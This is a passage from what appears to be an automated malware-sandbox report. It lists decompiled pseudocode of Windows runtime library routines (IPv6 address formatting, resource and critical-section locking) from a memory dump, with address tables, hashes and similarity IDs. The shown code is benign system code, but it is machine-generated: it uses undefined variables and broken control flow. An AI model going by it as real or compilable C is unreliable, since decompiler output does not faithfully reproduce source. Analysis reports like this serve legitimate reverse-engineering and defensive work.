                                                0x009521b8
                                                0x009521bc
                                                0x009521be
                                                0x00000000
                                                0x00000000
                                                0x009521c0
                                                0x009521c2
                                                0x009521c4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009521c4
                                                0x009521c6
                                                0x009521c6
                                                0x009521c8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009521c8
                                                0x009521a2
                                                0x00000000
                                                0x00952183
                                                0x0093057b
                                                0x0093057d
                                                0x00930581
                                                0x00930583
                                                0x00952178
                                                0x00000000
                                                0x00930589
                                                0x0093058f
                                                0x0093058f
                                                0x00930583
                                                0x00000000

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00952206
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-4236105082
                                                • Opcode ID: 5bac2ffc13fb144d662be6669fa16f61fbe03cf3b8748c2eaef6ea6fcbee22f5
                                                • Instruction ID: ca51e6844dad7edbf2558be4bd2a04dbf25a62ced0adc11364667baf96fc1ad3
                                                • Opcode Fuzzy Hash: 5bac2ffc13fb144d662be6669fa16f61fbe03cf3b8748c2eaef6ea6fcbee22f5
                                                • Instruction Fuzzy Hash: 5B5168357042016BEB14CB2ACC81F6733ADAFD5721F218229FD58DB386EA35EC458B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009314C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E009314C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x9d2088; // 0x774fe2a0
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00927707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E009313CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00927707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00927707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E008F2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E008FE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                0x009314c0
                                                0x009314cb
                                                0x009314d2
                                                0x009314d6
                                                0x009314da
                                                0x009314de
                                                0x009314e3
                                                0x0093157a
                                                0x0093157a
                                                0x009314f1
                                                0x009314f3
                                                0x0095ea0f
                                                0x00000000
                                                0x0095ea15
                                                0x00000000
                                                0x0095ea15
                                                0x009314f9
                                                0x009314f9
                                                0x009314fe
                                                0x00931504
                                                0x0095ea1a
                                                0x0095ea1f
                                                0x0095ea21
                                                0x0095ea22
                                                0x0095ea27
                                                0x0095ea2a
                                                0x0095ea2a
                                                0x00931515
                                                0x00931517
                                                0x0093156d
                                                0x00931572
                                                0x00931575
                                                0x00931575
                                                0x0093151e
                                                0x0095ea50
                                                0x0095ea55
                                                0x0095ea58
                                                0x0095ea58
                                                0x0093152e
                                                0x00931531
                                                0x00931533
                                                0x00000000
                                                0x00931535
                                                0x00931541
                                                0x00931549
                                                0x00931549
                                                0x00931533
                                                0x009314f3
                                                0x00931559

                                                APIs
                                                • ___swprintf_l.LIBCMT ref: 0095EA22
                                                  • Part of subcall function 009313CB: ___swprintf_l.LIBCMT ref: 0093146B
                                                  • Part of subcall function 009313CB: ___swprintf_l.LIBCMT ref: 00931490
                                                • ___swprintf_l.LIBCMT ref: 0093156D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: c5d1468fcb260e1fd07b6009ff392c588422e2f6b0073bac1651103e43bdd0fe
                                                • Instruction ID: 048c44b906a41b6a0fcfd0b54f49a6894cb1893b02c90f87deaf5d31aaf252b4
                                                • Opcode Fuzzy Hash: c5d1468fcb260e1fd07b6009ff392c588422e2f6b0073bac1651103e43bdd0fe
                                                • Instruction Fuzzy Hash: 3521C3729002299BCF21EF68CC41AEAB3ACFB90700F544411FD46E3250EB759A588FE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009153A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 44%
                                                			E009153A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009d01c0;
									_push(_t92);
									_push(0);
									_t37 = E008EF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00934FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00943F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00943F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0097217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00943F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00933915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00915384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E008EF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00933915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E008EF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00933915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E008EF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00933915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E00915329(_t74, _t92);
													_push(1);
													return E009153A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

























                                                0x009153ab
                                                0x009153ae
                                                0x009153b1
                                                0x009153b4
                                                0x009153b7
                                                0x009305b6
                                                0x009305c0
                                                0x009305c3
                                                0x00000000
                                                0x009305c9
                                                0x009305c9
                                                0x009305cc
                                                0x009305d5
                                                0x009305d5
                                                0x009153bd
                                                0x009153bd
                                                0x009153bd
                                                0x009153be
                                                0x009153be
                                                0x009153be
                                                0x009153c0
                                                0x00000000
                                                0x00000000
                                                0x00952269
                                                0x0095226d
                                                0x00952349
                                                0x0095234d
                                                0x00952273
                                                0x00952276
                                                0x00952279
                                                0x0095227e
                                                0x00952283
                                                0x00952287
                                                0x0095228a
                                                0x0095228d
                                                0x0095228f
                                                0x009522bc
                                                0x009522bc
                                                0x009522bc
                                                0x009522be
                                                0x009522c4
                                                0x009522cc
                                                0x009522d0
                                                0x009522d6
                                                0x009522d7
                                                0x009522da
                                                0x009522df
                                                0x009522e4
                                                0x00000000
                                                0x00000000
                                                0x009522e6
                                                0x009522e9
                                                0x009522f4
                                                0x009522f9
                                                0x009522fa
                                                0x00952305
                                                0x00952314
                                                0x00952319
                                                0x0095231a
                                                0x0095231d
                                                0x00952320
                                                0x00952323
                                                0x00952323
                                                0x00952328
                                                0x0095232d
                                                0x0095232f
                                                0x00952331
                                                0x00952336
                                                0x00952336
                                                0x0095233b
                                                0x0095233d
                                                0x00952350
                                                0x00952351
                                                0x00952356
                                                0x00952359
                                                0x00952359
                                                0x0095235b
                                                0x0095235d
                                                0x00915367
                                                0x0091536b
                                                0x00915372
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00952363
                                                0x00952363
                                                0x00952369
                                                0x0095236a
                                                0x0095236c
                                                0x00952371
                                                0x00952373
                                                0x00000000
                                                0x00952379
                                                0x00952379
                                                0x0095237a
                                                0x0095237f
                                                0x0095237f
                                                0x00952385
                                                0x00952386
                                                0x00952389
                                                0x0095238e
                                                0x00952390
                                                0x00915378
                                                0x0091537c
                                                0x00952396
                                                0x00952396
                                                0x00952397
                                                0x0095239c
                                                0x009523a2
                                                0x009523a3
                                                0x009523a6
                                                0x009523ab
                                                0x009523ad
                                                0x00000000
                                                0x009523b3
                                                0x009523b3
                                                0x009523b4
                                                0x009523b9
                                                0x009523ba
                                                0x009523ba
                                                0x009523bc
                                                0x009523bf
                                                0x00000000
                                                0x00000000
                                                0x00949153
                                                0x00949158
                                                0x0094915a
                                                0x0094915e
                                                0x00949160
                                                0x00000000
                                                0x00949166
                                                0x00949166
                                                0x00949171
                                                0x00949176
                                                0x00949176
                                                0x00000000
                                                0x00949160
                                                0x009523c6
                                                0x009523cb
                                                0x009523d7
                                                0x009523d7
                                                0x009523ad
                                                0x00952390
                                                0x00952373
                                                0x0095233f
                                                0x0095233f
                                                0x00000000
                                                0x0095233f
                                                0x00952291
                                                0x00952291
                                                0x00952293
                                                0x00952295
                                                0x0095229a
                                                0x009522a1
                                                0x009522a3
                                                0x009522a7
                                                0x009522a9
                                                0x00000000
                                                0x00000000
                                                0x009522ab
                                                0x009522ad
                                                0x009522af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009522af
                                                0x009522b1
                                                0x009522b4
                                                0x009522b4
                                                0x009522b6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009522b6
                                                0x0095228f
                                                0x00000000
                                                0x0095226d
                                                0x009153cb
                                                0x009153ce
                                                0x009153d0
                                                0x009153d4
                                                0x009153d6
                                                0x00000000
                                                0x009153d8
                                                0x009153e3
                                                0x009153ea
                                                0x009153ea
                                                0x009153d6
                                                0x00000000

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009522F4
                                                Strings
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009522FC
                                                • RTL: Re-Waiting, xrefs: 00952328
                                                • RTL: Resource at %p, xrefs: 0095230B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-871070163
                                                • Opcode ID: 36b6603f5377325689ac174b5a473a8affd35b503f0fc67ebb31431fd8ce832c
                                                • Instruction ID: 89a295fe3b25fcd6853076f20ea5a3360a5282f20d44b766f3818d913a766ec6
                                                • Opcode Fuzzy Hash: 36b6603f5377325689ac174b5a473a8affd35b503f0fc67ebb31431fd8ce832c
                                                • Instruction Fuzzy Hash: DB512771700605ABDB15DB29CC81FA6739CEFD5760F124229FD18DB281EA71ED868BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0091EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 51%
                                                			E0091EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0090DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x9d793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E008F16C0(_t39);
				} else {
					_t40 = E008EF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00933915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E008F01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x9d793c; // 0x0
								_push(_t85);
								_t44 = E008F1F28(_t71);
							} else {
								_t44 = E008EF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00933915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00972306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0091EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00934FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00943F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00943F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x9d20c0;
								if(_t85 != 0x9d20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0097217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00943F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                0x0091ec56
                                                0x0091ec56
                                                0x0091ec56
                                                0x0091ec5c
                                                0x0091ec64
                                                0x009523e6
                                                0x009523eb
                                                0x009523eb
                                                0x0091ec6a
                                                0x0091ec6c
                                                0x0091ec6f
                                                0x009523f3
                                                0x009523f8
                                                0x009523fa
                                                0x009523fc
                                                0x0091ec75
                                                0x0091ec76
                                                0x0091ec76
                                                0x0091ec7b
                                                0x0091ec7c
                                                0x0091ec7e
                                                0x00952406
                                                0x00952407
                                                0x0095240c
                                                0x0095240d
                                                0x0095240d
                                                0x0095240d
                                                0x00952414
                                                0x00952417
                                                0x0095241e
                                                0x00952435
                                                0x00952438
                                                0x0095243c
                                                0x0095243f
                                                0x00952442
                                                0x00952443
                                                0x00952446
                                                0x00952449
                                                0x00952453
                                                0x00952455
                                                0x0095245b
                                                0x0095245b
                                                0x0091eb99
                                                0x0091eb99
                                                0x0091eb9c
                                                0x0091eb9d
                                                0x0091eb9f
                                                0x0091eba2
                                                0x00952465
                                                0x0095246b
                                                0x0095246d
                                                0x0091eba8
                                                0x0091eba9
                                                0x0091eba9
                                                0x0091ebae
                                                0x0091ebb3
                                                0x0091ebb9
                                                0x0091ebbb
                                                0x00952513
                                                0x00952514
                                                0x00952519
                                                0x0095251b
                                                0x0091ec2a
                                                0x0091ec2d
                                                0x0091ec33
                                                0x0091ec36
                                                0x0091ec3a
                                                0x0091ec3e
                                                0x0091ec40
                                                0x0091ec47
                                                0x0091ec47
                                                0x0091ec40
                                                0x008f22c6
                                                0x0091ebc1
                                                0x0091ebc1
                                                0x0091ebc5
                                                0x0091ec9a
                                                0x0091ec9a
                                                0x0091ebd6
                                                0x0091ebd6
                                                0x00000000
                                                0x0091ebbb
                                                0x00952477
                                                0x0095247c
                                                0x00952486
                                                0x0095248b
                                                0x00952496
                                                0x0095249b
                                                0x0095249d
                                                0x009524a0
                                                0x009524a3
                                                0x009524aa
                                                0x009524aa
                                                0x009524a5
                                                0x009524a5
                                                0x009524a5
                                                0x009524ac
                                                0x009524af
                                                0x009524b0
                                                0x009524b3
                                                0x009524b9
                                                0x009524ba
                                                0x009524bb
                                                0x009524c6
                                                0x009524cb
                                                0x009524cd
                                                0x009524d0
                                                0x009524d1
                                                0x009524d4
                                                0x009524d6
                                                0x009524d9
                                                0x009524d9
                                                0x009524dc
                                                0x009524df
                                                0x009524e1
                                                0x009524e7
                                                0x009524e9
                                                0x009524ec
                                                0x009524ef
                                                0x009524f2
                                                0x009524f2
                                                0x009524ef
                                                0x009524e7
                                                0x009524fa
                                                0x009524ff
                                                0x00952501
                                                0x00952503
                                                0x00952506
                                                0x0095250b
                                                0x0091eb8c
                                                0x0091eb93
                                                0x00000000
                                                0x00000000
                                                0x0091eb93
                                                0x00000000
                                                0x0091eb99
                                                0x0091ec85
                                                0x0091ec85
                                                0x0091ec85
                                                0x00000000

                                                Strings
                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009524BD
                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0095248D
                                                • RTL: Re-Waiting, xrefs: 009524FA
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                • API String ID: 0-3177188983
                                                • Opcode ID: a12ee60f3f861bd863889686199f3866fb90a5c8b370d5c8dd44142255fc8691
                                                • Instruction ID: 7a9e063de6dcf3a45ccc4f3a4db3dc4b7f3d4f5b5390f2450da218f9d002c0e3
                                                • Opcode Fuzzy Hash: a12ee60f3f861bd863889686199f3866fb90a5c8b370d5c8dd44142255fc8691
                                                • Instruction Fuzzy Hash: BF411870A04208ABC720DFA9CC85FAB77A9EF85720F208A05FA55DB3D1D734E9458761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0092FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0092FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0092EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0092EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
